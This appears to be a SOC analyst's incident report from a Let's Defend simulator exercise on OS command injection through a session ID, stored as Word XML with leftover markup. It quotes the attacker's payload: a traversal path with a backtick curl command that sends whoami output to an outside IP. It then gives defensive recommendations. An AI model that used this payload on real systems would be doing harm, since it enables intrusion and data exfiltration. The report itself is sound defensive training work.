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3: OS Command Injection via Session ID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: OS Command Injection Using Manipulated Session ID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May 30,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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Let’s Defend SOC Simulator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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Critical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Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool: Chronicle SIEM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Injection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Taken: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Investigated unusual query logs in Chronicle SIEM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Detected this payload in the session ID field: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SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa\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`curl${IFS}144.172.79.92:4444?user=$(whoami)`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Scanned source IP (144.172.79.92) in VirusTotal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Flagged as malicious on VirusTotal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GeoIP: United States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that destination IP 172.16.17.139 had outbound connections to the attacker's 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Evidence suggests the command was executed and the output exfiltrated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Assessment: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 Positive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Command injection vulnerability allowed the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute shell commands (whoami) and exfiltrate data via curl.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 Recommendations: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outbound connections to 144.172.79.92 and related malicious IPs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Isolate affected internal host 172.16.17.139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Harden web applications by validating user input and disabling command injection vectors (e.g., backticks, ${IFS})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 Web Application Firewall (WAF) to detect command patterns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full system forensics on the affected host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